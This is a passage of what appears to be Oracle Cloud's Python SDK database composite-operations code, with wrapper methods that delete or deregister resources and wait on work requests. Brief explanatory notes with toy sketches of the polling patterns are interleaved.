as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_backup(backup_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_backup_destination_and_wait_for_state(self, backup_destination_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_backup_destination` and waits for the :py:class:`~oci.database.models.BackupDestination` acted upon
to enter the given state(s).
:param str backup_destination_id: (required)
The `OCID`__ of the backup destination.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.BackupDestination.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_backup_destination`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_backup_destination(backup_destination_id)
operation_result = None
try:
operation_result = self.client.delete_backup_destination(backup_destination_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
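``delete_backup_destination_and_wait_for_state`` (and ``delete_key_store_and_wait_for_state`` below) follow a common delete-then-wait shape: GET the resource before deleting so there is something to poll, map a 404 from the delete to ``WAIT_RESOURCE_NOT_FOUND``, and pass ``succeed_on_not_found=True`` so the resource disappearing counts as success. A toy model of that flow, with every name below (``FakeClient``, ``NotFoundError``, the sentinel) a stand-in rather than an SDK class:

```python
WAIT_RESOURCE_NOT_FOUND_SKETCH = object()  # analogue of the WAIT_RESOURCE_NOT_FOUND sentinel

class NotFoundError(Exception):
    """Stand-in for oci.exceptions.ServiceError with status 404."""
    status = 404

class FakeClient:
    """Stand-in client holding one resource that 404s once deleted."""
    def __init__(self):
        self.exists = True
    def get_resource(self):
        if not self.exists:
            raise NotFoundError()
        return "AVAILABLE"
    def delete_resource(self):
        if not self.exists:
            raise NotFoundError()
        self.exists = False

def delete_and_wait(client):
    client.get_resource()          # initial GET: fail fast if it never existed
    try:
        client.delete_resource()
    except NotFoundError as e:
        if e.status == 404:        # already gone: nothing left to wait for
            return WAIT_RESOURCE_NOT_FOUND_SKETCH
        raise
    try:                           # poll; succeed_on_not_found=True analogue
        return client.get_resource()
    except NotFoundError:
        return "TERMINATED"

client = FakeClient()
print(delete_and_wait(client))  # TERMINATED
```

The initial GET matters: once the delete succeeds, only that previously-captured response tells the waiter which resource to keep polling.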
def delete_cloud_exadata_infrastructure_and_wait_for_work_request(self, cloud_exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_cloud_exadata_infrastructure` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str cloud_exadata_infrastructure_id: (required)
The cloud Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_cloud_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_cloud_exadata_infrastructure(cloud_exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_cloud_vm_cluster_and_wait_for_work_request(self, cloud_vm_cluster_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_cloud_vm_cluster` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str cloud_vm_cluster_id: (required)
The cloud VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_cloud_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_cloud_vm_cluster(cloud_vm_cluster_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_database_and_wait_for_work_request(self, database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_database` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_database(database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_database_software_image_and_wait_for_work_request(self, database_software_image_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_database_software_image` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str database_software_image_id: (required)
The database software image `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_database_software_image`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_database_software_image(database_software_image_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_db_home_and_wait_for_work_request(self, db_home_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_db_home` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str db_home_id: (required)
The Database Home `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_db_home`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_db_home(db_home_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_exadata_infrastructure_and_wait_for_work_request(self, exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_exadata_infrastructure` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_exadata_infrastructure(exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_external_container_database_and_wait_for_work_request(self, external_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_external_container_database` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str external_container_database_id: (required)
The ExternalContainerDatabase `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_external_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_external_container_database(external_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_external_database_connector_and_wait_for_work_request(self, external_database_connector_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_external_database_connector` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str external_database_connector_id: (required)
The `OCID`__ of the
external database connector resource (`ExternalDatabaseConnectorId`).
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_external_database_connector`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_external_database_connector(external_database_connector_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_external_non_container_database_and_wait_for_work_request(self, external_non_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_external_non_container_database` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str external_non_container_database_id: (required)
The external non-container database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_external_non_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_external_non_container_database(external_non_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_external_pluggable_database_and_wait_for_work_request(self, external_pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_external_pluggable_database` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str external_pluggable_database_id: (required)
The ExternalPluggableDatabaseId `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_external_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_external_pluggable_database(external_pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_key_store_and_wait_for_state(self, key_store_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_key_store` and waits for the :py:class:`~oci.database.models.KeyStore` acted upon
to enter the given state(s).
:param str key_store_id: (required)
The `OCID`__ of the key store.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.KeyStore.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_key_store`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
initial_get_result = self.client.get_key_store(key_store_id)
operation_result = None
try:
operation_result = self.client.delete_key_store(key_store_id, **operation_kwargs)
except oci.exceptions.ServiceError as e:
if e.status == 404:
return WAIT_RESOURCE_NOT_FOUND
else:
raise e
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
try:
waiter_result = oci.wait_until(
self.client,
initial_get_result,
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
succeed_on_not_found=True,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_pluggable_database_and_wait_for_work_request(self, pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_pluggable_database` and waits for the :py:class:`~oci.work_requests.models.WorkRequest`
to enter the given state(s).
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_pluggable_database(pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
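The ``*_and_wait_for_work_request`` methods follow a second pattern: read the work-request OCID from the ``opc-work-request-id`` response header, then poll ``get_work_request`` until its ``status`` reaches a terminal value. A toy sketch of just that flow (``FakeWorkRequestClient`` and ``FakeWorkRequest`` are hypothetical; the real code polls through ``oci.wait_until`` with backoff rather than a bare loop):

```python
# Terminal statuses, mirroring oci.waiter._WORK_REQUEST_TERMINATION_STATES
TERMINAL_WORK_REQUEST_STATES = ['succeeded', 'failed', 'canceled']


class FakeWorkRequest:
    def __init__(self, status):
        self.status = status


class FakeWorkRequestClient:
    """Toy client: reports IN_PROGRESS on the first poll, SUCCEEDED afterwards."""
    def __init__(self):
        self.polls = 0

    def get_work_request(self, work_request_id):
        self.polls += 1
        status = 'SUCCEEDED' if self.polls >= 2 else 'IN_PROGRESS'
        return FakeWorkRequest(status)  # real responses wrap this in `.data`


def wait_for_work_request(work_request_client, operation_headers, states=None):
    """Toy version of the work-request pattern used by the composite methods."""
    states = [s.lower() for s in (states or TERMINAL_WORK_REQUEST_STATES)]
    # The mutating call returns no body; the work-request OCID travels in a header.
    work_request_id = operation_headers['opc-work-request-id']
    while True:
        wr = work_request_client.get_work_request(work_request_id)
        if wr.status and wr.status.lower() in states:
            return wr
        # the real implementation sleeps with capped backoff between polls
```

Note that FAILED and CANCELED are terminal too: the waiter returns when the work request *finishes*, not only when it succeeds, so callers should inspect the returned status.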
def delete_vm_cluster_and_wait_for_work_request(self, vm_cluster_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_vm_cluster` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str vm_cluster_id: (required)
The VM cluster `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_vm_cluster`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_vm_cluster(vm_cluster_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def delete_vm_cluster_network_and_wait_for_work_request(self, exadata_infrastructure_id, vm_cluster_network_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.delete_vm_cluster_network` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str exadata_infrastructure_id: (required)
The Exadata infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str vm_cluster_network_id: (required)
The VM cluster network `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.delete_vm_cluster_network`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.delete_vm_cluster_network(exadata_infrastructure_id, vm_cluster_network_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def deregister_autonomous_database_data_safe_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.deregister_autonomous_database_data_safe` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.deregister_autonomous_database_data_safe`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.deregister_autonomous_database_data_safe(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def disable_autonomous_database_management_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.disable_autonomous_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.disable_autonomous_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
